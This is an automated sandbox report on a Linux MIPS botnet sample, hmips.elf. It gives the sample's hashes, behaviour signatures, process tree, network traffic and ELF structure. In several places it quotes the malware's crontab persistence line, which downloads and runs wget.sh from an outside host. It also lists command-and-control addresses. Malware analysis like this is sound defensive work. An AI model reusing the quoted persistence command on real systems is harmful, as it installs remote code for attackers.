Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
hmips.elf

Overview

General Information

Sample name:hmips.elf
Analysis ID:1541273
MD5:6d59c717903b3c62e9318d7aafa4eea8
SHA1:1f02d41bd7f4fc202e718d37562d21948fb92351
SHA256:1083f56ec8e8e2b7af77bc21b87bead584b70a41ab06e21f183497d812efff24
Tags:elfuser-abuse_ch
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false

Signatures

Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1541273
Start date and time:2024-10-24 16:42:05 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 36s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:hmips.elf
Detection:MAL
Classification:mal52.troj.linELF@0/1@12/0
  • VT rate limit hit for: hmips.elf
Command:/tmp/hmips.elf
PID:6229
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
you are now apart of hail cock botnet
Standard Error:no crontab for root
  • system is lnxubuntu20
  • hmips.elf (PID: 6229, Parent: 6147, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/hmips.elf
    • sh (PID: 6231, Parent: 6229, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      • sh New Fork (PID: 6233, Parent: 6231)
        • sh New Fork (PID: 6235, Parent: 6233)
        • crontab (PID: 6235, Parent: 6233, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
      • sh New Fork (PID: 6234, Parent: 6231)
      • crontab (PID: 6234, Parent: 6231, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
  • dash New Fork (PID: 6332, Parent: 4332)
  • rm (PID: 6332, Parent: 4332, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.65q81DRzJS /tmp/tmp.BPOhT08nAE /tmp/tmp.DimVUE3TAX
  • dash New Fork (PID: 6333, Parent: 4332)
  • rm (PID: 6333, Parent: 4332, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.65q81DRzJS /tmp/tmp.BPOhT08nAE /tmp/tmp.DimVUE3TAX
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results
Source: tmp.v3tZhA.18.drString: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

Networking

barindex
Source: global trafficTCP traffic: 86.107.100.80 ports 15553,24314,1,2,3,4
Source: global trafficTCP traffic: 81.29.149.178 ports 15553,24314,1,2,3,4
Source: global trafficTCP traffic: 192.168.2.23:38898 -> 86.107.100.80:24314
Source: global trafficTCP traffic: 192.168.2.23:54528 -> 81.29.149.178:24314
Source: global trafficTCP traffic: 192.168.2.23:55180 -> 213.182.204.57:17897
Source: global trafficTCP traffic: 192.168.2.23:46834 -> 91.149.238.18:10131
Source: global trafficTCP traffic: 192.168.2.23:47754 -> 193.233.193.45:6773
Source: global trafficTCP traffic: 192.168.2.23:60074 -> 88.151.195.22:18836
Source: /tmp/hmips.elf (PID: 6229)Socket: 127.0.0.1:1172Jump to behavior
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownUDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknownUDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknownUDP traffic detected without corresponding DNS query: 168.235.111.72
Source: unknownUDP traffic detected without corresponding DNS query: 168.235.111.72
Source: unknownUDP traffic detected without corresponding DNS query: 202.61.197.122
Source: unknownUDP traffic detected without corresponding DNS query: 202.61.197.122
Source: unknownUDP traffic detected without corresponding DNS query: 64.176.6.48
Source: unknownUDP traffic detected without corresponding DNS query: 64.176.6.48
Source: unknownUDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknownUDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknownUDP traffic detected without corresponding DNS query: 152.53.15.127
Source: unknownUDP traffic detected without corresponding DNS query: 168.235.111.72
Source: global trafficDNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: tmp.v3tZhA.18.drString found in binary or memory: http://hailcocks.ru/wget.sh;
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33606
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 33606 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal52.troj.linELF@0/1@12/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 6235)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 6234)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /usr/bin/crontab (PID: 6234)File: /var/spool/cron/crontabs/tmp.v3tZhAJump to behavior
Source: /usr/bin/crontab (PID: 6234)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/hmips.elf (PID: 6231)Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"Jump to behavior
Source: /usr/bin/dash (PID: 6332)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.65q81DRzJS /tmp/tmp.BPOhT08nAE /tmp/tmp.DimVUE3TAXJump to behavior
Source: /usr/bin/dash (PID: 6333)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.65q81DRzJS /tmp/tmp.BPOhT08nAE /tmp/tmp.DimVUE3TAXJump to behavior
Source: submitted sampleStderr: no crontab for root: exit code = 0
Source: /tmp/hmips.elf (PID: 6229)Queries kernel information via 'uname': Jump to behavior
Source: hmips.elf, 6229.1.00007fff91a61000.00007fff91a82000.rw-.sdmp, hmips.elf, 6236.1.00007fff91a61000.00007fff91a82000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mips/tmp/hmips.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/hmips.elf
Source: hmips.elf, 6229.1.000055fb88b60000.000055fb88c29000.rw-.sdmp, hmips.elf, 6236.1.000055fb88b60000.000055fb88c29000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mips
Source: hmips.elf, 6229.1.000055fb88b60000.000055fb88c29000.rw-.sdmp, hmips.elf, 6236.1.000055fb88b60000.000055fb88c29000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
Source: hmips.elf, 6229.1.00007fff91a61000.00007fff91a82000.rw-.sdmp, hmips.elf, 6236.1.00007fff91a61000.00007fff91a82000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Scheduled Task/Job
1
Scheduled Task/Job
1
File Deletion
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting
Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Application Layer Protocol
Traffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1541273 Sample: hmips.elf Startdate: 24/10/2024 Architecture: LINUX Score: 52 34 81.29.149.178, 15553, 24314, 38128 COMUNICA_IT_SERVICESCH Switzerland 2->34 36 86.107.100.80, 15553, 24314, 38898 AMG-ASRO Romania 2->36 38 9 other IPs or domains 2->38 40 Connects to many ports of the same IP (likely port scanning) 2->40 9 hmips.elf 2->9         started        11 dash rm 2->11         started        13 dash rm 2->13         started        signatures3 process4 process5 15 hmips.elf sh 9->15         started        17 hmips.elf 9->17         started        19 hmips.elf 9->19         started        process6 21 sh crontab 15->21         started        25 sh 15->25         started        27 hmips.elf 17->27         started        file7 32 /var/spool/cron/crontabs/tmp.v3tZhA, ASCII 21->32 dropped 42 Sample tries to persist itself using cron 21->42 44 Executes the "crontab" command typically for achieving persistence 21->44 29 sh crontab 25->29         started        signatures8 process9 signatures10 46 Executes the "crontab" command typically for achieving persistence 29->46
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
kingstonwikkerink.dyn
194.87.198.29
truefalse
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://hailcocks.ru/wget.sh;tmp.v3tZhA.18.drfalse
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      213.182.204.57
      unknownLatvia
      9009M247GBfalse
      193.233.193.45
      unknownRussian Federation
      2895FREE-NET-ASFREEnetEUfalse
      109.202.202.202
      unknownSwitzerland
      13030INIT7CHfalse
      86.107.100.80
      unknownRomania
      38995AMG-ASROtrue
      54.171.230.55
      unknownUnited States
      16509AMAZON-02USfalse
      88.151.195.22
      unknownAzerbaijan
      15723AZERONLINEAZfalse
      81.29.149.178
      unknownSwitzerland
      39616COMUNICA_IT_SERVICESCHtrue
      91.149.238.18
      unknownPoland
      41952MARTON-ASPLfalse
      91.189.91.43
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      91.189.91.42
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      54.171.230.55ppc.elfGet hashmaliciousUnknownBrowse
        bot.arm6.elfGet hashmaliciousMirai, OkiruBrowse
          ppc.elfGet hashmaliciousMirai, MoobotBrowse
            na.elfGet hashmaliciousUnknownBrowse
              garm6.elfGet hashmaliciousMiraiBrowse
                .i.elfGet hashmaliciousUnknownBrowse
                  na.elfGet hashmaliciousUnknownBrowse
                    sora.m68k.elfGet hashmaliciousMiraiBrowse
                      iLoYpTmnHz.elfGet hashmaliciousUnknownBrowse
                        zOSCVTuLxE.elfGet hashmaliciousGafgyt, MiraiBrowse
                          213.182.204.57arm7.elfGet hashmaliciousUnknownBrowse
                            mips.elfGet hashmaliciousUnknownBrowse
                              arm5.elfGet hashmaliciousUnknownBrowse
                                x86.elfGet hashmaliciousUnknownBrowse
                                  88.151.195.22arm7.elfGet hashmaliciousUnknownBrowse
                                    mpsl.elfGet hashmaliciousUnknownBrowse
                                      mips.elfGet hashmaliciousUnknownBrowse
                                        arm5.elfGet hashmaliciousUnknownBrowse
                                          109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                          • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                          81.29.149.178ppc.elfGet hashmaliciousUnknownBrowse
                                            mips.elfGet hashmaliciousUnknownBrowse
                                              arm5.elfGet hashmaliciousUnknownBrowse
                                                91.149.238.18mips.elfGet hashmaliciousUnknownBrowse
                                                  arm5.elfGet hashmaliciousUnknownBrowse
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    kingstonwikkerink.dynarm7.elfGet hashmaliciousUnknownBrowse
                                                    • 185.82.200.181
                                                    mpsl.elfGet hashmaliciousUnknownBrowse
                                                    • 81.29.149.178
                                                    ppc.elfGet hashmaliciousUnknownBrowse
                                                    • 88.151.195.22
                                                    mips.elfGet hashmaliciousUnknownBrowse
                                                    • 88.151.195.22
                                                    arm5.elfGet hashmaliciousUnknownBrowse
                                                    • 88.151.195.22
                                                    arm4.elfGet hashmaliciousUnknownBrowse
                                                    • 88.151.195.22
                                                    x86.elfGet hashmaliciousUnknownBrowse
                                                    • 185.82.200.181
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 27.102.115.180
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 158.51.124.230
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 45.144.172.147
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    M247GBarm7.elfGet hashmaliciousUnknownBrowse
                                                    • 213.182.204.57
                                                    n3GMxqBnUE.exeGet hashmaliciousUnknownBrowse
                                                    • 172.86.80.42
                                                    n3GMxqBnUE.exeGet hashmaliciousUnknownBrowse
                                                    • 172.86.80.42
                                                    la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                    • 38.201.120.183
                                                    m68k.elfGet hashmaliciousUnknownBrowse
                                                    • 193.31.73.102
                                                    arm5.elfGet hashmaliciousMiraiBrowse
                                                    • 38.202.251.242
                                                    mips.elfGet hashmaliciousUnknownBrowse
                                                    • 213.182.204.57
                                                    arm5.elfGet hashmaliciousUnknownBrowse
                                                    • 213.182.204.57
                                                    x86.elfGet hashmaliciousUnknownBrowse
                                                    • 213.182.204.57
                                                    irq2.elfGet hashmaliciousTsunamiBrowse
                                                    • 213.209.152.135
                                                    AMAZON-02UShttps://lnk.ie/73BGS/e=?utm_campaign=&utm_medium=email&utm_source=eloqua&utm_content=EMS&elqTrackId=b3e6296b7e034428ab6cf8165586e5f3&elq=f15d0983a3e2469a9348a180a5d34fca&elqaid=2922&elqat=1&elqCampaignId=1792&elqak=8AF50EC23DDB3CA8DB8B1F52080496E6D8BDFEE307A00555CA936F9692C081A369A3Get hashmaliciousUnknownBrowse
                                                    • 143.204.215.34
                                                    Payment for outstanding statements.pdfGet hashmaliciousHTMLPhisherBrowse
                                                    • 52.31.86.79
                                                    https://t.ly/8LgfkGet hashmaliciousUnknownBrowse
                                                    • 18.245.31.5
                                                    https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                    • 18.245.31.5
                                                    Due Payment Invoice PISS2024993.exeGet hashmaliciousFormBookBrowse
                                                    • 76.223.67.189
                                                    ATT25322.htmlGet hashmaliciousUnknownBrowse
                                                    • 54.216.81.134
                                                    https://egift.activationshub.com/gift-card/view/8lPFUrjq1LGzg7JHwS8hJJRdL/Get hashmaliciousUnknownBrowse
                                                    • 143.204.215.107
                                                    https://app.pandadoc.com/document/v2?token=69b8ae0059c2551a9a27ed1b65653c1a0b5ee1ffGet hashmaliciousUnknownBrowse
                                                    • 44.236.119.144
                                                    https://app.writesonic.com/share/writing-assistant/d140c48b-3642-43bf-a085-e258c1fb4f03Get hashmaliciousUnknownBrowse
                                                    • 3.161.75.15
                                                    https://egift.activationshub.com/gift-card/view/8lPFUrjq1LGzg7JHwS8hJJRdL/Get hashmaliciousUnknownBrowse
                                                    • 143.204.215.66
                                                    INIT7CHvqsjh4.elfGet hashmaliciousGafgyt, Mirai, OkiruBrowse
                                                    • 109.202.202.202
                                                    vwkjebwi686.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 109.202.202.202
                                                    arm7.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    mpsl.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    ppc.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    mozi.m.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    tftp.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    .i.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    i486.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                                                    • 109.202.202.202
                                                    FREE-NET-ASFREEnetEU5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 147.45.44.221
                                                    http://heks.egrowbrands.com/yuop/66e9b62daa62d_xin.exeGet hashmaliciousUnknownBrowse
                                                    • 147.45.44.104
                                                    http://hans.uniformeslaamistad.com/malesa/6705347f535f8_install.exeGet hashmaliciousUnknownBrowse
                                                    • 147.45.44.104
                                                    http://heks.egrowbrands.com/lopsa/67057a2256a25_SwiftKey.exeGet hashmaliciousUnknownBrowse
                                                    • 147.45.44.104
                                                    http://lide.omernisar.com/lopsa/66daf6d8ac980_PeakSports.exeGet hashmaliciousUnknownBrowse
                                                    • 147.45.44.104
                                                    01oTkKQVSW.exeGet hashmaliciousUnknownBrowse
                                                    • 147.45.47.185
                                                    01oTkKQVSW.exeGet hashmaliciousUnknownBrowse
                                                    • 147.45.47.185
                                                    G57uwXZLsE.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 147.45.41.134
                                                    Document-19-06-38.jsGet hashmaliciousBruteRatelBrowse
                                                    • 147.45.116.47
                                                    Document-19-06-38.jsGet hashmaliciousBruteRatelBrowse
                                                    • 147.45.116.47
                                                    No context
                                                    No context
                                                    Process:/usr/bin/crontab
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):306
                                                    Entropy (8bit):5.156993913677584
                                                    Encrypted:false
                                                    SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQLYCovZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXA:8QjHig8UCmeHLUHYC+GABjnOGAFkz
                                                    MD5:325B1638BC1DEACECAB6278C0C978212
                                                    SHA1:07B57AC2C569825E311AF0A1D91CD2E9A3B8ACE0
                                                    SHA-256:AC225D8299C986438EEFEF77EB1F63947890AEA053F93D4637A0F626E439E2AA
                                                    SHA-512:A0170BB523A978E1D91898B8B7969048CD1AE912D12A8785165708A291208E253EF31A7104878E06A97CA1A1EB020F28B442C29236C256C96401DE1FAD185D61
                                                    Malicious:true
                                                    Reputation:low
                                                    Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Thu Oct 24 09:42:48 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.
                                                    File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                                    Entropy (8bit):5.368529979755849
                                                    TrID:
                                                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                    File name:hmips.elf
                                                    File size:76'996 bytes
                                                    MD5:6d59c717903b3c62e9318d7aafa4eea8
                                                    SHA1:1f02d41bd7f4fc202e718d37562d21948fb92351
                                                    SHA256:1083f56ec8e8e2b7af77bc21b87bead584b70a41ab06e21f183497d812efff24
                                                    SHA512:91633b981c63ca3eff3b46d4b1c395401a24cb00f3cfa875ef46bc4a79dc4bbdaf47ca3da36e1c1f82014ce7ce7b0c4b81f17aa13574fb30d83a1b76680ed71b
                                                    SSDEEP:1536:mj0T19TexobEblXqlXt5XOjvquFTnRIon6b+1eUfliXl0cT:9BnbEPquFTnRns+9s0cT
                                                    TLSH:9B73C95E6E318FEDF66D833043B74A31A75923D123E1D685D2ADD2101F7028E585FBA8
                                                    File Content Preview:.ELF.....................@.`...4..*......4. ...(.............@...@........................ ..E ..E ....0..[.........dt.Q............................<...'..L...!'.......................<...'..(...!... ....'9... ......................<...'......!........'9.

                                                    ELF header

                                                    Class:ELF32
                                                    Data:2's complement, big endian
                                                    Version:1 (current)
                                                    Machine:MIPS R3000
                                                    Version Number:0x1
                                                    Type:EXEC (Executable file)
                                                    OS/ABI:UNIX - System V
                                                    ABI Version:0
                                                    Entry Point Address:0x400260
                                                    Flags:0x1007
                                                    ELF Header Size:52
                                                    Program Header Offset:52
                                                    Program Header Size:32
                                                    Number of Program Headers:3
                                                    Section Header Offset:76436
                                                    Section Header Size:40
                                                    Number of Section Headers:14
                                                    Header String Table Index:13
                                                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                    NULL0x00x00x00x00x0000
                                                    .initPROGBITS0x4000940x940x8c0x00x6AX004
                                                    .textPROGBITS0x4001200x1200xfc900x00x6AX0016
                                                    .finiPROGBITS0x40fdb00xfdb00x5c0x00x6AX004
                                                    .rodataPROGBITS0x40fe100xfe100x19f00x00x2A0016
                                                    .ctorsPROGBITS0x4520000x120000x80x00x3WA004
                                                    .dtorsPROGBITS0x4520080x120080x80x00x3WA004
                                                    .data.rel.roPROGBITS0x4520140x120140x40x00x3WA004
                                                    .dataPROGBITS0x4520200x120200x3c80x00x3WA0016
                                                    .gotPROGBITS0x4523f00x123f00x6400x40x10000003WAp0016
                                                    .sbssNOBITS0x452a300x12a300x2c0x00x10000003WAp004
                                                    .bssNOBITS0x452a600x12a300x51380x00x3WA0016
                                                    .mdebug.abi32PROGBITS0xcde0x12a300x00x00x0001
                                                    .shstrtabSTRTAB0x00x12a300x640x00x0001
                                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                    LOAD0x00x4000000x4000000x118000x118005.51930x5R E0x10000.init .text .fini .rodata
                                                    LOAD0x120000x4520000x4520000xa300x5b983.50320x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
                                                    GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Oct 24, 2024 16:42:49.034970045 CEST43928443192.168.2.2391.189.91.42
                                                    Oct 24, 2024 16:42:54.410286903 CEST42836443192.168.2.2391.189.91.43
                                                    Oct 24, 2024 16:42:54.767457008 CEST3889824314192.168.2.2386.107.100.80
                                                    Oct 24, 2024 16:42:54.773139954 CEST243143889886.107.100.80192.168.2.23
                                                    Oct 24, 2024 16:42:54.773212910 CEST3889824314192.168.2.2386.107.100.80
                                                    Oct 24, 2024 16:42:54.773468018 CEST3889824314192.168.2.2386.107.100.80
                                                    Oct 24, 2024 16:42:54.779258966 CEST243143889886.107.100.80192.168.2.23
                                                    Oct 24, 2024 16:42:54.779330015 CEST3889824314192.168.2.2386.107.100.80
                                                    Oct 24, 2024 16:42:54.784796953 CEST243143889886.107.100.80192.168.2.23
                                                    Oct 24, 2024 16:42:54.930939913 CEST5452824314192.168.2.2381.29.149.178
                                                    Oct 24, 2024 16:42:54.936805010 CEST243145452881.29.149.178192.168.2.23
                                                    Oct 24, 2024 16:42:54.936872005 CEST5452824314192.168.2.2381.29.149.178
                                                    Oct 24, 2024 16:42:54.937104940 CEST5452824314192.168.2.2381.29.149.178
                                                    Oct 24, 2024 16:42:54.942497015 CEST243145452881.29.149.178192.168.2.23
                                                    Oct 24, 2024 16:42:54.942549944 CEST5452824314192.168.2.2381.29.149.178
                                                    Oct 24, 2024 16:42:54.948081017 CEST243145452881.29.149.178192.168.2.23
                                                    Oct 24, 2024 16:42:55.434160948 CEST4251680192.168.2.23109.202.202.202
                                                    Oct 24, 2024 16:42:55.869882107 CEST243145452881.29.149.178192.168.2.23
                                                    Oct 24, 2024 16:42:55.869906902 CEST243145452881.29.149.178192.168.2.23
                                                    Oct 24, 2024 16:42:55.870035887 CEST5452824314192.168.2.2381.29.149.178
                                                    Oct 24, 2024 16:42:55.870037079 CEST5452824314192.168.2.2381.29.149.178
                                                    Oct 24, 2024 16:42:55.870413065 CEST5452824314192.168.2.2381.29.149.178
                                                    Oct 24, 2024 16:42:56.129350901 CEST243143889886.107.100.80192.168.2.23
                                                    Oct 24, 2024 16:42:56.129618883 CEST3889824314192.168.2.2386.107.100.80
                                                    Oct 24, 2024 16:42:56.129798889 CEST3889824314192.168.2.2386.107.100.80
                                                    Oct 24, 2024 16:43:00.886291027 CEST5518017897192.168.2.23213.182.204.57
                                                    Oct 24, 2024 16:43:00.891838074 CEST1789755180213.182.204.57192.168.2.23
                                                    Oct 24, 2024 16:43:00.891916990 CEST5518017897192.168.2.23213.182.204.57
                                                    Oct 24, 2024 16:43:00.891963959 CEST5518017897192.168.2.23213.182.204.57
                                                    Oct 24, 2024 16:43:00.897628069 CEST1789755180213.182.204.57192.168.2.23
                                                    Oct 24, 2024 16:43:00.897701025 CEST5518017897192.168.2.23213.182.204.57
                                                    Oct 24, 2024 16:43:00.903193951 CEST1789755180213.182.204.57192.168.2.23
                                                    Oct 24, 2024 16:43:01.144301891 CEST4683410131192.168.2.2391.149.238.18
                                                    Oct 24, 2024 16:43:01.149796963 CEST101314683491.149.238.18192.168.2.23
                                                    Oct 24, 2024 16:43:01.149889946 CEST4683410131192.168.2.2391.149.238.18
                                                    Oct 24, 2024 16:43:01.149955988 CEST4683410131192.168.2.2391.149.238.18
                                                    Oct 24, 2024 16:43:01.155658007 CEST101314683491.149.238.18192.168.2.23
                                                    Oct 24, 2024 16:43:01.155889034 CEST4683410131192.168.2.2391.149.238.18
                                                    Oct 24, 2024 16:43:01.161307096 CEST101314683491.149.238.18192.168.2.23
                                                    Oct 24, 2024 16:43:01.756094933 CEST1789755180213.182.204.57192.168.2.23
                                                    Oct 24, 2024 16:43:01.756409883 CEST5518017897192.168.2.23213.182.204.57
                                                    Oct 24, 2024 16:43:01.756599903 CEST5518017897192.168.2.23213.182.204.57
                                                    Oct 24, 2024 16:43:01.955043077 CEST101314683491.149.238.18192.168.2.23
                                                    Oct 24, 2024 16:43:01.955475092 CEST4683410131192.168.2.2391.149.238.18
                                                    Oct 24, 2024 16:43:01.955553055 CEST4683410131192.168.2.2391.149.238.18
                                                    Oct 24, 2024 16:43:09.768177032 CEST43928443192.168.2.2391.189.91.42
                                                    Oct 24, 2024 16:43:11.809458017 CEST5201415553192.168.2.2386.107.100.80
                                                    Oct 24, 2024 16:43:11.815419912 CEST155535201486.107.100.80192.168.2.23
                                                    Oct 24, 2024 16:43:11.815500021 CEST5201415553192.168.2.2386.107.100.80
                                                    Oct 24, 2024 16:43:11.815543890 CEST5201415553192.168.2.2386.107.100.80
                                                    Oct 24, 2024 16:43:11.823600054 CEST155535201486.107.100.80192.168.2.23
                                                    Oct 24, 2024 16:43:11.823661089 CEST5201415553192.168.2.2386.107.100.80
                                                    Oct 24, 2024 16:43:11.831135988 CEST155535201486.107.100.80192.168.2.23
                                                    Oct 24, 2024 16:43:12.004391909 CEST3812815553192.168.2.2381.29.149.178
                                                    Oct 24, 2024 16:43:12.011485100 CEST155533812881.29.149.178192.168.2.23
                                                    Oct 24, 2024 16:43:12.011574030 CEST3812815553192.168.2.2381.29.149.178
                                                    Oct 24, 2024 16:43:12.011615038 CEST3812815553192.168.2.2381.29.149.178
                                                    Oct 24, 2024 16:43:12.020605087 CEST155533812881.29.149.178192.168.2.23
                                                    Oct 24, 2024 16:43:12.020670891 CEST3812815553192.168.2.2381.29.149.178
                                                    Oct 24, 2024 16:43:12.029002905 CEST155533812881.29.149.178192.168.2.23
                                                    Oct 24, 2024 16:43:12.944202900 CEST155533812881.29.149.178192.168.2.23
                                                    Oct 24, 2024 16:43:12.944222927 CEST155533812881.29.149.178192.168.2.23
                                                    Oct 24, 2024 16:43:12.944643974 CEST3812815553192.168.2.2381.29.149.178
                                                    Oct 24, 2024 16:43:12.944643974 CEST3812815553192.168.2.2381.29.149.178
                                                    Oct 24, 2024 16:43:12.944734097 CEST3812815553192.168.2.2381.29.149.178
                                                    Oct 24, 2024 16:43:17.962135077 CEST477546773192.168.2.23193.233.193.45
